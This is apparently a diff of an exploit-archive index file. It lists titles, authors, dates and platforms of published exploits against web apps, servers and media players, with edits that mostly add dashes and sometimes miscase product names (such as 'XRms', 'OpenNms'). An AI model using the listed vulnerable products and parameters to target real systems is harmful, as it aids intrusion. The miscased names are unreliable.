32185,platforms/asp/webapps/32185.txt,"KAPhotoservice search.asp filename Parameter XSS",2008-08-06,by_casper41,asp,webapps,0 -32186,platforms/php/webapps/32186.txt,"Quate CMS 0.3.4 Multiple Cross-Site Scripting Vulnerabilities",2008-08-06,CraCkEr,php,webapps,0 -32187,platforms/php/webapps/32187.txt,"com_utchat component Mambo and Joomla! Component 0.2 Multiple Remote File Include Vulnerabilities",2008-08-06,by_casper41,php,webapps,0 +32186,platforms/php/webapps/32186.txt,"Quate CMS 0.3.4 - Multiple Cross-Site Scripting Vulnerabilities",2008-08-06,CraCkEr,php,webapps,0 +32187,platforms/php/webapps/32187.txt,"com_utchat component Mambo and Joomla! Component 0.2 - Multiple Remote File Include Vulnerabilities",2008-08-06,by_casper41,php,webapps,0 32188,platforms/php/webapps/32188.txt,"Multiple WebmasterSite Products Remote Command Execution Vulnerability",2008-08-06,otmorozok428,php,webapps,0 32189,platforms/multiple/remote/32189.py,"DD-WRT Site Survey SSID Script Injection Vulnerability",2008-08-06,"Rafael Dominguez Vega",multiple,remote,0 32190,platforms/php/webapps/32190.txt,"Kshop 2.22 'kshop_search.php' Cross-Site Scripting Vulnerability",2008-08-06,Lostmon,php,webapps,0 32191,platforms/php/webapps/32191.txt,"PHP-Nuke Kleinanzeigen Module 'lid' Parameter SQL Injection Vulnerability",2008-08-06,Lovebug,php,webapps,0 32192,platforms/multiple/dos/32192.txt,"Combat Evolved 1.0.7.0615 - Multiple Denial Of Service Vulnerabilities",2008-08-06,"Luigi Auriemma",multiple,dos,0 -32193,platforms/multiple/dos/32193.txt,"OpenVMS 8.3 Finger Service Stack Based Buffer Overflow Vulnerability",2008-08-07,"Shaun Colley",multiple,dos,0 +32193,platforms/multiple/dos/32193.txt,"OpenVms 8.3 Finger Service Stack Based Buffer Overflow Vulnerability",2008-08-07,"Shaun Colley",multiple,dos,0 32194,platforms/multiple/dos/32194.txt,"NoticeWare Email Server 4.6 NG LOGIN Messages Denial Of Service Vulnerability",2008-08-06,Antunes,multiple,dos,0 32195,platforms/multiple/dos/32195.txt,"Qbik WinGate 6.2.2 LIST Command Remote Denial of Service Vulnerability",2008-08-08,Antunes,multiple,dos,0 32196,platforms/php/webapps/32196.txt,"RMSOFT MiniShop 1.0 'search.php' Multiple Cross-Site Scripting Vulnerabilities",2008-08-09,Lostmon,php,webapps,0 @@ -28973,7 +28973,7 @@ id,file,description,date,author,platform,type,port 32214,platforms/php/webapps/32214.pl,"FreePBX 2.11.0 - Remote Command Execution",2014-03-12,@0x00string,php,webapps,80 32215,platforms/php/webapps/32215.txt,"RMSOFT Downloads Plus (rmdp) 1.5/1.7 Module for XOOPS search.php key Parameter XSS",2008-08-09,Lostmon,php,webapps,0 32216,platforms/php/webapps/32216.txt,"RMSOFT Downloads Plus (rmdp) 1.5/1.7 Module for XOOPS down.php id Parameter XSS",2008-08-09,Lostmon,php,webapps,0 -32217,platforms/php/webapps/32217.txt,"Linkspider 1.08 Multiple Remote File Include Vulnerabilities",2008-08-08,"Rohit Bansal",php,webapps,0 +32217,platforms/php/webapps/32217.txt,"Linkspider 1.08 - Multiple Remote File Include Vulnerabilities",2008-08-08,"Rohit Bansal",php,webapps,0 32218,platforms/php/webapps/32218.txt,"Domain Group Network GooCMS 1.02 'index.php' Cross-Site Scripting Vulnerability",2008-08-11,ahmadbaby,php,webapps,0 32219,platforms/php/webapps/32219.txt,"Kayako SupportSuite 3.x visitor/index.php sessionid Parameter XSS",2008-08-11,"James Bercegay",php,webapps,0 32220,platforms/php/webapps/32220.txt,"Kayako SupportSuite 3.x index.php filter Parameter XSS",2008-08-11,"James Bercegay",php,webapps,0 @@ -28996,7 +28996,7 @@ id,file,description,date,author,platform,type,port 32237,platforms/hardware/webapps/32237.txt,"Ubee EVW3200 - Multiple Persistent Cross Site Scripting",2014-03-13,"Jeroen - IT Nerdbox",hardware,webapps,0 32238,platforms/hardware/webapps/32238.txt,"Ubee EVW3200 - Cross Site Request Forgery",2014-03-13,"Jeroen - IT Nerdbox",hardware,webapps,0 32239,platforms/php/webapps/32239.txt,"Trixbox All Versions - SQL Injection",2014-03-13,Sc4nX,php,webapps,0 -32240,platforms/php/webapps/32240.txt,"Freeway 1.4.1 Multiple Input Validation Vulnerabilities",2008-08-13,"Digital Security Research Group",php,webapps,0 +32240,platforms/php/webapps/32240.txt,"Freeway 1.4.1 - Multiple Input Validation Vulnerabilities",2008-08-13,"Digital Security Research Group",php,webapps,0 32241,platforms/php/webapps/32241.txt,"PHP Realty 'dpage.php' SQL Injection Vulnerability",2008-08-13,CraCkEr,php,webapps,0 32242,platforms/php/webapps/32242.txt,"PHP-Fusion 4.01 'readmore.php' SQL Injection Vulnerability",2008-08-13,Rake,php,webapps,0 32243,platforms/php/webapps/32243.txt,"Nukeviet 2.0 'admin/login.php' Cookie Authentication Bypass Vulnerability",2008-08-13,Ciph3r,php,webapps,0 @@ -29017,7 +29017,7 @@ id,file,description,date,author,platform,type,port 32258,platforms/cgi/webapps/32258.txt,"AWStats 6.8 'awstats.pl' Cross-Site Scripting Vulnerability",2008-08-18,"Morgan Todd",cgi,webapps,0 32259,platforms/php/webapps/32259.txt,"Freeway 1.4.1.171 english/account.php language Parameter Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps,0 32261,platforms/windows/local/32261.rb,"MicroP 0.1.1.1600 - (.mppl) Local Stack Based Buffer Overflow",2014-03-14,"Necmettin COSKUN",windows,local,0 -32263,platforms/php/webapps/32263.txt,"Trixbox (endpoint_aastra.php, mac param) - Remote Code Injection",2014-03-14,i-Hmx,php,webapps,80 +32263,platforms/php/webapps/32263.txt,"Trixbox (endpoint_aastra.php, mac param) - Remote Code Injection",2014-03-14,i-Hmx,php,webapps,80 32264,platforms/php/webapps/32264.txt,"Freeway 1.4.1.171 - french/account_newsletters.php language Parameter Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps,0 32265,platforms/php/webapps/32265.txt,"Freeway 1.4.1.171 includes/modules/faqdesk/faqdesk_article_require.php language Parameter Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps,0 32266,platforms/php/webapps/32266.txt,"Freeway 1.4.1.171 includes/modules/newsdesk/newsdesk_article_require.php language Parameter Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps,0 @@ -29058,8 +29058,8 @@ id,file,description,date,author,platform,type,port 32303,platforms/linux/remote/32303.txt,"Mono <= 2.0 'System.Web' HTTP Header Injection Vulnerability",2008-08-20,"Juraj Skripsky",linux,remote,0 32304,platforms/linux/dos/32304.txt,"Red Hat 8/9 Directory Server Crafted Search Pattern Denial of Service Vulnerability",2008-08-27,"Ulf Weltman",linux,dos,0 32305,platforms/hardware/dos/32305.txt,"Dreambox Web Interface URI Remote Denial of Service Vulnerability",2008-08-29,"Marc Ruef",hardware,dos,0 -32306,platforms/php/webapps/32306.txt,"dotProject 2.1.2 Multiple SQL Injection and Cross-Site Scripting Vulnerabilities",2008-08-29,C1c4Tr1Z,php,webapps,0 -32307,platforms/php/webapps/32307.txt,"vtiger CRM 5.0.4 Multiple Cross-Site Scripting Vulnerabilities",2008-09-01,"Fabian Fingerle",php,webapps,0 +32306,platforms/php/webapps/32306.txt,"dotProject 2.1.2 - Multiple SQL Injection and Cross-Site Scripting Vulnerabilities",2008-08-29,C1c4Tr1Z,php,webapps,0 +32307,platforms/php/webapps/32307.txt,"vtiger CRM 5.0.4 - Multiple Cross-Site Scripting Vulnerabilities",2008-09-01,"Fabian Fingerle",php,webapps,0 32308,platforms/php/webapps/32308.txt,"GenPortal 'buscarCat.php' Cross-Site Scripting Vulnerability",2008-09-01,sl4xUz,php,webapps,0 32309,platforms/php/webapps/32309.txt,"Full PHP Emlak Script - 'landsee.php' SQL Injection Vulnerability",2008-08-29,"Hussin X",php,webapps,0 32310,platforms/multiple/dos/32310.txt,"Softalk Mail Server 8.5.1 'APPEND' Command Remote Denial of Service Vulnerability",2008-09-02,Antunes,multiple,dos,0 @@ -29069,17 +29069,17 @@ id,file,description,date,author,platform,type,port 32314,platforms/php/webapps/32314.txt,"OpenDB 1.0.6 listings.php title Parameter XSS",2008-08-28,C1c4Tr1Z,php,webapps,0 32315,platforms/php/webapps/32315.txt,"OpenDB 1.0.6 user_profile.php redirect_url Parameter XSS",2008-08-28,C1c4Tr1Z,php,webapps,0 32316,platforms/php/webapps/32316.txt,"eliteCMS 1.0 'page' Parameter SQL Injection Vulnerability",2008-09-03,e.wiZz!,php,webapps,0 -32317,platforms/php/webapps/32317.txt,"@Mail 5.42 and @Mail WebMail 5.0.5 Multiple Cross-Site Scripting Vulnerabilities",2008-09-03,C1c4Tr1Z,php,webapps,0 -32318,platforms/php/webapps/32318.txt,"XRMS 1.99.2 login.php target Parameter XSS",2008-09-04,"Fabian Fingerle",php,webapps,0 +32317,platforms/php/webapps/32317.txt,"@Mail 5.42 and @Mail WebMail 5.0.5 - Multiple Cross-Site Scripting Vulnerabilities",2008-09-03,C1c4Tr1Z,php,webapps,0 +32318,platforms/php/webapps/32318.txt,"XRms 1.99.2 login.php target Parameter XSS",2008-09-04,"Fabian Fingerle",php,webapps,0 32319,platforms/php/webapps/32319.txt,"OpenSupports 2.x - Auth Bypass/CSRF Vulnerabilities",2014-03-17,"TN CYB3R",php,webapps,0 -32320,platforms/php/webapps/32320.txt,"XRMS 1.99.2 - activities/some.php title Parameter XSS",2008-09-04,"Fabian Fingerle",php,webapps,0 -32321,platforms/php/webapps/32321.txt,"XRMS 1.99.2 - companies/some.php company_name Parameter XSS",2008-09-04,"Fabian Fingerle",php,webapps,0 -32322,platforms/php/webapps/32322.txt,"XRMS 1.99.2 contacts/some.php last_name Parameter XSS",2008-09-04,"Fabian Fingerle",php,webapps,0 -32323,platforms/php/webapps/32323.txt,"XRMS 1.99.2 campaigns/some.php campaign_title Parameter XSS",2008-09-04,"Fabian Fingerle",php,webapps,0 -32324,platforms/php/webapps/32324.txt,"XRMS 1.99.2 opportunities/some.php opportunity_title Parameter XSS",2008-09-04,"Fabian Fingerle",php,webapps,0 -32325,platforms/php/webapps/32325.txt,"XRMS 1.99.2 cases/some.php case_title Parameter XSS",2008-09-04,"Fabian Fingerle",php,webapps,0 -32326,platforms/php/webapps/32326.txt,"XRMS 1.99.2 files/some.php file_id Parameter XSS",2008-09-04,"Fabian Fingerle",php,webapps,0 -32327,platforms/php/webapps/32327.txt,"XRMS 1.99.2 reports/custom/mileage.php starting Parameter XSS",2008-09-04,"Fabian Fingerle",php,webapps,0 +32320,platforms/php/webapps/32320.txt,"XRms 1.99.2 - activities/some.php title Parameter XSS",2008-09-04,"Fabian Fingerle",php,webapps,0 +32321,platforms/php/webapps/32321.txt,"XRms 1.99.2 - companies/some.php company_name Parameter XSS",2008-09-04,"Fabian Fingerle",php,webapps,0 +32322,platforms/php/webapps/32322.txt,"XRms 1.99.2 contacts/some.php last_name Parameter XSS",2008-09-04,"Fabian Fingerle",php,webapps,0 +32323,platforms/php/webapps/32323.txt,"XRms 1.99.2 campaigns/some.php campaign_title Parameter XSS",2008-09-04,"Fabian Fingerle",php,webapps,0 +32324,platforms/php/webapps/32324.txt,"XRms 1.99.2 opportunities/some.php opportunity_title Parameter XSS",2008-09-04,"Fabian Fingerle",php,webapps,0 +32325,platforms/php/webapps/32325.txt,"XRms 1.99.2 cases/some.php case_title Parameter XSS",2008-09-04,"Fabian Fingerle",php,webapps,0 +32326,platforms/php/webapps/32326.txt,"XRms 1.99.2 files/some.php file_id Parameter XSS",2008-09-04,"Fabian Fingerle",php,webapps,0 +32327,platforms/php/webapps/32327.txt,"XRms 1.99.2 reports/custom/mileage.php starting Parameter XSS",2008-09-04,"Fabian Fingerle",php,webapps,0 32329,platforms/windows/dos/32329.rb,"Gold MP4 Player 3.3 - Universal SEH Exploit (MSF)",2014-03-17,"Revin Hadi Saputra",windows,dos,0 32330,platforms/php/webapps/32330.txt,"OpenSupports 2.0 - Blind SQL Injection",2014-03-17,indoushka,php,webapps,0 32331,platforms/php/webapps/32331.txt,"Joomla AJAX Shoutbox <= 1.6 - Remote SQL Injection Vulnerability",2014-03-17,"Ibrahim Raafat",php,webapps,0 @@ -29088,13 +29088,13 @@ id,file,description,date,author,platform,type,port 32334,platforms/php/webapps/32334.txt,"Celerondude Uploader 6.1 'account.php' Cross-Site Scripting Vulnerability",2008-09-03,Xc0re,php,webapps,0 32335,platforms/multiple/dos/32335.js,"Google Chrome 0.2.149 Malformed 'view-source' HTTP Header Remote Denial of Service Vulnerability",2008-09-05,"Juan Pablo Lopez Yacubian",multiple,dos,0 32336,platforms/hardware/remote/32336.txt,"D-Link DIR-100 1.12 Security Bypass Vulnerability",2008-09-08,"Marc Ruef",hardware,remote,0 -32337,platforms/php/webapps/32337.txt,"Silentum LoginSys 1.0 Multiple Cross-Site Scripting Vulnerabilities",2008-09-06,"Maximiliano Soler",php,webapps,0 +32337,platforms/php/webapps/32337.txt,"Silentum LoginSys 1.0 - Multiple Cross-Site Scripting Vulnerabilities",2008-09-06,"Maximiliano Soler",php,webapps,0 32338,platforms/php/webapps/32338.txt,"phpAdultSite CMS 'results_per_page' Parameter Cross-Site Scripting Vulnerability",2008-09-07,"David Sopas",php,webapps,0 32339,platforms/windows/remote/32339.txt,"Microsoft Organization Chart 2 - Remote Code Execution Vulnerability",2008-09-08,"Ivan Sanchez",windows,remote,0 -32340,platforms/php/webapps/32340.txt,"Gallery 2.0 Multiple Cross Site Scripting Vulnerabilities",2008-09-08,sl4xUz,php,webapps,0 +32340,platforms/php/webapps/32340.txt,"Gallery 2.0 - Multiple Cross Site Scripting Vulnerabilities",2008-09-08,sl4xUz,php,webapps,0 32341,platforms/hardware/dos/32341.html,"Apple iPhone 1.1.4/2.0 and iPod 1.1.4/2.0 touch Safari WebKit 'alert()' Function Remote Denial of Service Vulnerability",2008-09-12,"Nicolas Economou",hardware,dos,0 32342,platforms/php/webapps/32342.txt,"eXtrovert software Thyme 1.3 'pick_users.php' SQL Injection Vulnerability",2008-09-08,"Omer Singer",php,webapps,0 -32343,platforms/php/local/32343.php,"PHP 5.2.5 Multiple Functions 'safe_mode_exec_dir' and 'open_basedir' Restriction Bypass Vulnerabilities",2008-09-08,Ciph3r,php,local,0 +32343,platforms/php/local/32343.php,"PHP 5.2.5 - Multiple Functions 'safe_mode_exec_dir' and 'open_basedir' Restriction Bypass Vulnerabilities",2008-09-08,Ciph3r,php,local,0 32344,platforms/windows/remote/32344.txt,"Microsoft Windows Image Acquisition Logger ActiveX Control Arbitrary File Overwrite Vulnerability (1)",2008-09-08,Ciph3r,windows,remote,0 32345,platforms/windows/remote/32345.cpp,"Microsoft Windows Image Acquisition Logger ActiveX Control Arbitrary File Overwrite Vulnerability (2)",2008-09-08,Ciph3r,windows,remote,0 32346,platforms/php/webapps/32346.txt,"E-Php B2B Trading Marketplace Script 'listings.php' SQL Injection Vulnerability",2008-09-07,r45c4l,php,webapps,0 @@ -29110,12 +29110,12 @@ id,file,description,date,author,platform,type,port 32356,platforms/windows/dos/32356.txt,"ZoneAlarm Security Suite 7.0 - AntiVirus Directory Path Buffer Overflow Vulnerability",2008-09-11,"Juan Pablo Lopez Yacubian",windows,dos,0 32358,platforms/windows/local/32358.pl,"MP3Info 0.8.5a - SEH Buffer Overflow Exploit",2014-03-19,"Ayman Sagy",windows,local,0 32359,platforms/php/remote/32359.txt,"SePortal 2.5 - SQL Injection Vulnerabilty",2014-03-19,jsass,php,remote,0 -32360,platforms/php/webapps/32360.txt,"NooMS 1.1 - smileys.php page_id Parameter XSS",2008-09-11,Dr.Crash,php,webapps,0 -32361,platforms/php/webapps/32361.txt,"NooMS 1.1 - search.php q Parameter XSS",2008-09-11,Dr.Crash,php,webapps,0 +32360,platforms/php/webapps/32360.txt,"Nooms 1.1 - smileys.php page_id Parameter XSS",2008-09-11,Dr.Crash,php,webapps,0 +32361,platforms/php/webapps/32361.txt,"Nooms 1.1 - search.php q Parameter XSS",2008-09-11,Dr.Crash,php,webapps,0 32362,platforms/multiple/remote/32362.txt,"Unreal Engine 3 - Failed Memory Allocation Remote Denial of Service Vulnerability",2008-09-12,"Luigi Auriemma",multiple,remote,0 32363,platforms/multiple/remote/32363.txt,"Epic Games Unreal Engine 436 - Multiple Format String Vulnerabilities",2008-09-11,"Luigi Auriemma",multiple,remote,0 32364,platforms/php/webapps/32364.txt,"Dynamic MP3 Lister 2.0.1 'index.php' Multiple Cross Site Scripting Vulnerabilities",2008-09-12,Xylitol,php,webapps,0 -32365,platforms/php/webapps/32365.txt,"Paranews 3.4 Multiple Cross Site Scripting Vulnerabilities",2008-09-12,Xylitol,php,webapps,0 +32365,platforms/php/webapps/32365.txt,"Paranews 3.4 - Multiple Cross Site Scripting Vulnerabilities",2008-09-12,Xylitol,php,webapps,0 32366,platforms/php/webapps/32366.txt,"QuicO 'photo.php' SQL Injection Vulnerability",2008-09-12,"Beenu Arora",php,webapps,0 32367,platforms/unix/remote/32367.rb,"Quantum vmPRO - Backdoor Command",2014-03-19,metasploit,unix,remote,22 32368,platforms/jsp/webapps/32368.txt,"McAfee Asset Manager 6.6 - Multiple Vulnerabilities",2014-03-19,"Brandon Perry",jsp,webapps,80 @@ -29129,7 +29129,7 @@ id,file,description,date,author,platform,type,port 32382,platforms/multiple/remote/32382.txt,"Accellion File Transfer Appliance Error Report Message - Open Email Relay Vulnerability",2008-09-15,"Eric Beaulieu",multiple,remote,0 32383,platforms/php/webapps/32383.txt,"phpMyAdmin <= 3.2 - 'server_databases.php' Remote Command Execution Vulnerability",2008-09-15,"Norman Hippert",php,webapps,0 32384,platforms/linux/dos/32384.txt,"Linux Kernel 2.6.x - 'add_to_page_cache_lru()' Local Denial of Service Vulnerability",2007-07-20,"Jens Axboe",linux,dos,0 -32385,platforms/hardware/webapps/32385.txt,"Dlink DIR-600L Hardware Version AX Firmware Version 1.00 - CSRF Vulnerability",2014-03-20,"Dhruv Shah",hardware,webapps,0 +32385,platforms/hardware/webapps/32385.txt,"Dlink DIR-600L Hardware Version AX Firmware 1.00 - CSRF Vulnerability",2014-03-20,"Dhruv Shah",hardware,webapps,0 32386,platforms/multiple/dos/32386.txt,"Unreal Engine 'UnChan.cpp' Failed Assertion Remote Denial of Service Vulnerability",2008-09-16,"Luigi Auriemma",multiple,dos,0 32387,platforms/php/webapps/32387.txt,"Quick CMS Lite 2.1 - 'admin.php' Cross Site Scripting Vulnerability",2008-09-16,"John Cobb",php,webapps,0 32388,platforms/php/webapps/32388.txt,"Cars & Vehicle - 'page.php' SQL Injection Vulnerability",2008-09-17,"Hussin X",php,webapps,0 @@ -29141,7 +29141,7 @@ id,file,description,date,author,platform,type,port 32394,platforms/asp/webapps/32394.txt,"Sama Educational Management System 'Error.asp' Cross-Site Scripting Vulnerability",2008-09-18,Lagon666,asp,webapps,0 32395,platforms/php/webapps/32395.txt,"HyperStop WebHost Directory 1.2 Database Disclosure Vulnerability",2008-09-19,r45c4l,php,webapps,0 32396,platforms/php/webapps/32396.txt,"Parallels H-Sphere 3.0/3.1 'login.php' Multiple Cross Site Scripting Vulnerabilities",2008-09-19,t0fx,php,webapps,0 -32397,platforms/php/webapps/32397.txt,"PHP Pro Bid 5.2.4/6.04 Multiple SQL Injection Vulnerabilities",2008-09-19,"Jan Van Niekerk",php,webapps,0 +32397,platforms/php/webapps/32397.txt,"PHP Pro Bid 5.2.4/6.04 - Multiple SQL Injection Vulnerabilities",2008-09-19,"Jan Van Niekerk",php,webapps,0 32398,platforms/php/webapps/32398.txt,"eXtrovert software Thyme 1.3 'add_calendars.php' Cross Site Scripting Vulnerability",2008-09-21,"DigiTrust Group",php,webapps,0 32399,platforms/unix/remote/32399.txt,"Multiple Vendor FTP Server Long Command Handling Security Vulnerability",2008-09-20,"Maksymilian Arciemowicz",unix,remote,0 32400,platforms/multiple/dos/32400.html,"Foxmail Email Client 6.5 'mailto' Buffer Overflow Vulnerability",2008-09-22,sebug,multiple,dos,0 @@ -29164,11 +29164,11 @@ id,file,description,date,author,platform,type,port 32418,platforms/php/webapps/32418.txt,"EasyRealtorPRO 2008 'site_search.php' Multiple SQL Injection Vulnerabilities",2008-09-25,"David Sopas",php,webapps,0 32419,platforms/php/webapps/32419.pl,"Libra File Manager 1.18/2.0 'fileadmin.php' Local File Include Vulnerability",2008-09-25,Pepelux,php,webapps,0 32420,platforms/windows/dos/32420.c,"Mass Downloader Malformed Executable Denial Of Service Vulnerability",2008-09-25,Ciph3r,windows,dos,0 -32421,platforms/php/webapps/32421.html,"FlatPress 0.804 Multiple Cross-Site Scripting Vulnerabilities",2008-09-25,"Fabian Fingerle",php,webapps,0 +32421,platforms/php/webapps/32421.html,"FlatPress 0.804 - Multiple Cross-Site Scripting Vulnerabilities",2008-09-25,"Fabian Fingerle",php,webapps,0 32422,platforms/php/webapps/32422.txt,"Vikingboard <= 0.2 Beta 'register.php' SQL Column Truncation Unauthorized Access Vulnerability",2008-09-25,StAkeR,php,webapps,0 -32423,platforms/jsp/webapps/32423.txt,"OpenNMS 1.5.x j_acegi_security_check j_username Parameter XSS",2008-09-25,d2d,jsp,webapps,0 -32424,platforms/jsp/webapps/32424.txt,"OpenNMS 1.5.x notification/list.jsp username Parameter XSS",2008-09-25,d2d,jsp,webapps,0 -32425,platforms/jsp/webapps/32425.txt,"OpenNMS 1.5.x event/list filter Parameter XSS",2008-09-25,d2d,jsp,webapps,0 +32423,platforms/jsp/webapps/32423.txt,"OpenNms 1.5.x j_acegi_security_check j_username Parameter XSS",2008-09-25,d2d,jsp,webapps,0 +32424,platforms/jsp/webapps/32424.txt,"OpenNms 1.5.x notification/list.jsp username Parameter XSS",2008-09-25,d2d,jsp,webapps,0 +32425,platforms/jsp/webapps/32425.txt,"OpenNms 1.5.x event/list filter Parameter XSS",2008-09-25,d2d,jsp,webapps,0 32426,platforms/windows/remote/32426.c,"DATAC RealWin SCADA Server 2.0 Remote Stack Buffer Overflow Vulnerability",2008-09-26,"Ruben Santamarta ",windows,remote,0 32427,platforms/php/webapps/32427.txt,"Barcode Generator 2.0 'LSTable.php' Remote File Include Vulnerability",2008-09-26,"Br0k3n H34rT",php,webapps,0 32428,platforms/windows/dos/32428.txt,"ZoneAlarm 8.0.20 HTTP Proxy Remote Denial of Service Vulnerability",2008-09-26,quakerdoomer,windows,dos,0 @@ -29192,7 +29192,7 @@ id,file,description,date,author,platform,type,port 32447,platforms/php/webapps/32447.txt,"A4Desk Event Calendar 'v' Parameter Remote File Include Vulnerability",2008-09-30,Lo$er,php,webapps,0 32448,platforms/java/webapps/32448.txt,"Celoxis Multiple Cross-Site Scripting Vulnerabilities",2008-10-01,teuquooch1seero,java,webapps,0 32449,platforms/php/webapps/32449.txt,"H-Sphere WebShell 4.3.10 'actions.php' Multiple Cross Site Scripting Vulnerabilities",2008-10-01,C1c4Tr1Z,php,webapps,0 -32450,platforms/php/webapps/32450.txt,"WikyBlog 1.7.1 Multiple Cross-Site Scripting Vulnerabilities",2008-10-01,"Omer Singer",php,webapps,0 +32450,platforms/php/webapps/32450.txt,"WikyBlog 1.7.1 - Multiple Cross-Site Scripting Vulnerabilities",2008-10-01,"Omer Singer",php,webapps,0 32451,platforms/linux/dos/32451.txt,"Fedora 8/9 Linux Kernel 'utrace_control' NULL Pointer Dereference Denial of Service Vulnerability",2008-10-02,"Michael Simms",linux,dos,0 32452,platforms/linux/dos/32452.txt,"Adobe Flash Player 9/10 - SWF Version Null Pointer Dereference Denial of Service Vulnerability",2008-10-02,"Matthew Dempsky",linux,dos,0 32453,platforms/php/webapps/32453.txt,"Dreamcost HostAdmin 3.1 'index.php' Cross-Site Scripting Vulnerability",2008-10-02,Am!r,php,webapps,0 @@ -29200,7 +29200,7 @@ id,file,description,date,author,platform,type,port 32455,platforms/php/webapps/32455.pl,"Website Directory 'index.php' Cross-Site Scripting Vulnerability",2008-10-03,"Ghost Hacker",php,webapps,0 32456,platforms/windows/remote/32456.txt,"RhinoSoft Serv-U FTP Server 7.2.0.1 'rnto' Command Directory Traversal Vulnerability",2008-10-03,dmnt,windows,remote,0 32457,platforms/windows/remote/32457.txt,"XAMPP for Windows 1.6.8 'cds.php' SQL Injection Vulnerability",2008-10-03,"Jaykishan Nirmal",windows,remote,0 -32458,platforms/multiple/remote/32458.txt,"OpenNMS 1.5.x HTTP Response Splitting Vulnerability",2008-10-05,"BugSec LTD",multiple,remote,0 +32458,platforms/multiple/remote/32458.txt,"OpenNms 1.5.x HTTP Response Splitting Vulnerability",2008-10-05,"BugSec LTD",multiple,remote,0 32459,platforms/java/webapps/32459.txt,"VeriSign Kontiki Delivery Management System 5.0 'action' Parameter Cross Site Scripting Vulnerability",2008-10-05,"Mazin Faour",java,webapps,0 32460,platforms/windows/remote/32460.txt,"XAMPP for Windows 1.6.8 'phonebook.php' SQL Injection Vulnerability",2008-10-06,"Jaykishan Nirmal",windows,remote,0 32461,platforms/php/webapps/32461.txt,"AmpJuke 0.7.5 'index.php' SQL Injection Vulnerability",2008-10-03,S_DLA_S,php,webapps,0 @@ -29220,7 +29220,7 @@ id,file,description,date,author,platform,type,port 32475,platforms/multiple/remote/32475.sql,"Oracle Database Server <= 11.1 'CREATE ANY DIRECTORY' Privilege Escalation Vulnerability",2008-10-13,"Paul M. Wright",multiple,remote,0 32477,platforms/windows/dos/32477.py,"Windows Media Player 11.0.5721.5230 - Memory Corruption PoC",2014-03-24,"TUNISIAN CYBER",windows,dos,0 32478,platforms/windows/dos/32478.py,"jetVideo 8.1.1 - Basic (.wav) Local Crash PoC",2014-03-24,"TUNISIAN CYBER",windows,dos,0 -32479,platforms/php/webapps/32479.txt,"BigDump 0.35b - Arbitrary Upload",2014-03-24,"felipe andrian",php,webapps,0 +32479,platforms/php/webapps/32479.txt,"BigDump 0.35b - Arbitrary Upload",2014-03-24,"felipe andrian",php,webapps,0 32481,platforms/windows/dos/32481.txt,"Light Audio Player 1.0.14 - Memory Corruption PoC",2014-03-24,"TUNISIAN CYBER",windows,dos,0 32482,platforms/windows/dos/32482.py,"GOM Media Player (GOMMP) 2.2.56.5183 - Memory Corruption PoC",2014-03-24,"TUNISIAN CYBER",windows,dos,0 32483,platforms/windows/dos/32483.py,"GOM Video Converter 1.1.0.60 (.wav) - Memory Corruption PoC",2014-03-24,"TUNISIAN CYBER",windows,dos,0 @@ -29246,7 +29246,7 @@ id,file,description,date,author,platform,type,port 32504,platforms/php/webapps/32504.txt,"Cart Engine 3.0.0 (task.php) Local File Inclusion Vulnerability",2014-03-25,LiquidWorm,php,webapps,0 32505,platforms/php/webapps/32505.txt,"Cart Engine 3.0.0 Database Backup Disclosure Exploit",2014-03-25,LiquidWorm,php,webapps,0 32506,platforms/php/webapps/32506.txt,"Kemana Directory 1.5.6 - kemana_admin_passwd Cookie User Password Hash Disclosure",2014-03-25,LiquidWorm,php,webapps,0 -32507,platforms/php/webapps/32507.txt,"Kemana Directory 1.5.6 Remote Code Execution",2014-03-25,LiquidWorm,php,webapps,0 +32507,platforms/php/webapps/32507.txt,"Kemana Directory 1.5.6 - Remote Code Execution",2014-03-25,LiquidWorm,php,webapps,0 32508,platforms/php/webapps/32508.txt,"Kemana Directory 1.5.6 (run param) Local File Inclusion Vulnerability",2014-03-25,LiquidWorm,php,webapps,0 32509,platforms/php/webapps/32509.txt,"Kemana Directory 1.5.6 Database Backup Disclosure Exploit",2014-03-25,LiquidWorm,php,webapps,0 32510,platforms/php/webapps/32510.txt,"Kemana Directory 1.5.6 (qvc_init()) Cookie Poisoning CAPTCHA Bypass Exploit",2014-03-25,LiquidWorm,php,webapps,0 @@ -29268,10 +29268,10 @@ id,file,description,date,author,platform,type,port 32526,platforms/php/webapps/32526.txt,"ClipShare Pro 4.0 'fullscreen.php' Cross Site Scripting Vulnerability",2008-10-23,ShockShadow,php,webapps,0 32527,platforms/php/webapps/32527.txt,"Adam Wright HTMLTidy 0.5 'html-tidy-logic.php' Cross Site Scripting Vulnerability",2008-10-23,ShockShadow,php,webapps,0 32528,platforms/php/webapps/32528.txt,"iPeGuestbook 1.7/2.0 'pg' Parameter Cross-Site Scripting Vulnerability",2008-10-24,"Ghost Hacker",php,webapps,0 -32529,platforms/multiple/remote/32529.java,"Sun Java Web Start 1.0/1.2 Remote Command Execution Vulnerability",2008-10-25,"Varun Srivastava",multiple,remote,0 +32529,platforms/multiple/remote/32529.java,"Sun Java Web Start 1.0/1.2 - Remote Command Execution Vulnerability",2008-10-25,"Varun Srivastava",multiple,remote,0 32530,platforms/linux/remote/32530.txt,"Lynx 2.8 '.mailcap' and '.mime.type' Files Local Code Execution Vulnerability",2008-11-03,"Piotr Engelking",linux,remote,0 32531,platforms/php/webapps/32531.txt,"phpMyAdmin <= 3.0.1 'pmd_pdf.php' Cross Site Scripting Vulnerability",2008-10-27,"Hadi Kiamarsi",php,webapps,0 -32532,platforms/php/webapps/32532.txt,"bcoos 1.0.13 'include/common.php' Remote File Include Vulnerability",2008-10-27,Cru3l.b0y,php,webapps,0 +32532,platforms/php/webapps/32532.txt,"bcoos 1.0.13 - 'include/common.php' Remote File Include Vulnerability",2008-10-27,Cru3l.b0y,php,webapps,0 32533,platforms/php/webapps/32533.txt,"Tandis CMS 2.5 'index.php' Multiple SQL Injection Vulnerabilities",2008-10-27,G4N0K,php,webapps,0 32534,platforms/unix/dos/32534.py,"Python <= 2.5.2 'Imageop' Module Argument Validation Buffer Overflow Vulnerability",2008-10-27,"Chris Evans",unix,dos,0 32535,platforms/php/webapps/32535.txt,"MyBB 1.4.2 'moderation.php' Cross-Site Scripting Vulnerability",2008-10-27,Kellanved,php,webapps,0 @@ -29285,7 +29285,7 @@ id,file,description,date,author,platform,type,port 